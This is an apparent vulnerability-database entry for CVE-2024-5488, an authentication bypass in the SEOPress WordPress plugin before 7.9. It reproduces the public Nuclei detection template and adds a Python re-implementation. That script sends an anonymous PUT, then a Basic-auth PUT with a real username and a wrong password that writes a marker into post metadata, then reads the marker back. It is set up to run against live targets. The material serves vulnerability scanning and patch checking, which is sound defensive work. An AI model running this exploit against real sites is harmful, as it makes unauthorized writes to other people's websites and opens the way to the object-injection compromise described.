CVE-2024-5488: SEOPress < 7.9 - Authentication Bypass

Date: 2025-08-01 | Affected software: SEOPress | PoC: public

Vulnerability description

The SEOPress WordPress plugin before 7.9 does not properly protect some of its REST API routes, which, combined with another Object Injection vulnerability, can allow unauthenticated attackers to unserialize malicious gadget chains, compromising the site if a suitable chain is present.

PoC code [public]

id: CVE-2024-5488

info:
  name: SEOPress < 7.9 - Authentication Bypass
  author: pdresearch,iamnoooob,rootxharsh
  severity: critical
  description: |
    The SEOPress WordPress plugin before 7.9 does not properly protect some of its REST API routes, which combined with another Object Injection vulnerability can allow unauthenticated attackers to unserialize malicious gadget chains, compromising the site if a suitable chain is present.
  reference:
    - https://wpscan.com/blog/object-injection-vulnerability-fixed-in-seopress-7-9/
    - https://wpscan.com/vulnerability/28507376-ded0-4e1a-b2fc-2182895aa14c/
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-5488
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-5488
    epss-score: 0.72733
    epss-percentile: 0.98735
  metadata:
    verified: true
    max-request: 3
  tags: cve,cve2024,wp,wordpress,wp-plugin,seopress,auth-bypass

flow: http(1) && http(2) && http(3)

variables:
  marker: "{{randstr}}"
  username: "admin"

http:
  - raw:
      - |
        PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - 'Sorry, you are not allowed to do that.'
        internal: true

  - raw:
      - |
        PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username+':aaaaaa')}}
        Content-Type: application/x-www-form-urlencoded

        title={{marker}}&description={{marker}}

    matchers:
      - type: word
        part: body
        words:
          - '"code":"success"'
        internal: true

  - raw:
      - |
        GET /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - '"title":"{{marker}}","description":"{{marker}}"'
# digest: 490a004630440220309deb516f2b2d69221c9afb2a4c6e852eef5e937b110e28c2d3f3065315fe75022041b11d708ea361204f0c46349bb6d728b6dede9d63f660ef7f16da17399991df:922c64590222798bb761d5b6d8e72950
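The following is an added example, not code from the original page, from the template authors, or from the SEOPress project. It re-implements the template's three-step flow in plain Python for environments where Nuclei is not available: an anonymous PUT that must be refused, the same PUT with a Basic header carrying a real username and a deliberately wrong password, and an anonymous GET that reads the metas back to confirm the marker was persisted. The route path, the "not allowed" string, the `"code":"success"` marker and the read-back format are taken from the template; the `make_fake_transport` fixture and the host `wp.example` are constructed here so the logic can be exercised offline, and `urllib_transport` is the assumed live transport for a real engagement.

```python
"""
Stand-alone re-implementation of the three-step check in the Nuclei template
above (added example; not the page's, the template authors' or SEOPress's code).
The HTTP transport is injectable so the logic can run offline against a
constructed fake site.
"""
import base64
import json
import secrets
import string
import urllib.error
import urllib.request

# Route path taken from the template; post_id 1 is the default WordPress post.
ROUTE = "/wp-json/seopress/v1/posts/{post_id}/title-description-metas"
NOT_ALLOWED = "Sorry, you are not allowed to do that."


def random_marker(n=12):
    """Random alphanumeric token, the equivalent of Nuclei's {{randstr}}."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(n))


def urllib_transport(method, url, headers=None, body=None, timeout=10):
    """Live transport (assumed): returns (status, body_text); 4xx/5xx are returned, not raised."""
    req = urllib.request.Request(url, data=body, method=method, headers=headers or {})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def check_seopress_auth_bypass(base_url, post_id=1, username="admin",
                               transport=urllib_transport, marker=None):
    """Return a dict with 'vulnerable', 'reason' and the marker that was used."""
    marker = marker or random_marker()
    url = base_url.rstrip("/") + ROUTE.format(post_id=post_id)

    # Step 1: anonymous PUT. Any install, patched or not, must refuse this;
    # if it does not, the target is not behaving the way the template expects.
    _, body = transport("PUT", url)
    if NOT_ALLOWED not in body:
        return {"vulnerable": False, "marker": marker,
                "reason": "step1: anonymous PUT was not rejected as expected"}

    # Step 2: same write, now with a Basic header for a real username and a
    # password that is deliberately wrong. A correct permission callback still
    # rejects this; a vulnerable install answers {"code":"success"}.
    creds = base64.b64encode(f"{username}:aaaaaa".encode()).decode()
    _, body = transport(
        "PUT", url,
        headers={"Authorization": f"Basic {creds}",
                 "Content-Type": "application/x-www-form-urlencoded"},
        body=f"title={marker}&description={marker}".encode(),
    )
    if '"code":"success"' not in body:
        return {"vulnerable": False, "marker": marker,
                "reason": "step2: write with bogus credentials was rejected"}

    # Step 3: read the metas back without credentials; finding the marker
    # proves the unauthenticated write actually landed in the database.
    _, body = transport("GET", url)
    persisted = f'"title":"{marker}","description":"{marker}"' in body
    return {"vulnerable": persisted, "marker": marker,
            "reason": "step3: marker persisted" if persisted
            else "step3: marker not found on read-back"}


def _compact(obj):
    """JSON without spaces, matching the byte-exact substrings the matchers look for."""
    return json.dumps(obj, separators=(",", ":"))


def make_fake_transport(vulnerable):
    """Constructed in-memory stand-in for a WordPress site (test fixture, not a
    real target). It keeps the last accepted title/description like the route."""
    state = {"title": "Hello world!", "description": ""}
    forbidden = _compact({"code": "rest_forbidden", "message": NOT_ALLOWED,
                          "data": {"status": 401}})

    def transport(method, url, headers=None, body=None, timeout=10):
        headers = headers or {}
        if method == "PUT":
            if "Authorization" not in headers or not vulnerable:
                # Patched behaviour: bogus credentials leave the caller anonymous.
                return 401, forbidden
            fields = dict(part.split("=", 1) for part in body.decode().split("&"))
            state["title"], state["description"] = fields["title"], fields["description"]
            return 200, _compact({"code": "success"})
        if method == "GET":
            return 200, _compact(state)
        return 405, ""

    return transport


if __name__ == "__main__":
    for label, flag in (("vulnerable fixture", True), ("patched fixture", False)):
        print(label, check_seopress_auth_bypass("http://wp.example",
                                                transport=make_fake_transport(flag)))
```

Against a live target, call `check_seopress_auth_bypass("https://target")` with the default transport; the function sends exactly the three requests the template's `max-request: 3` declares and, like the template, reports a hit only when the marker survives the unauthenticated read-back, not merely when step 2 returns success.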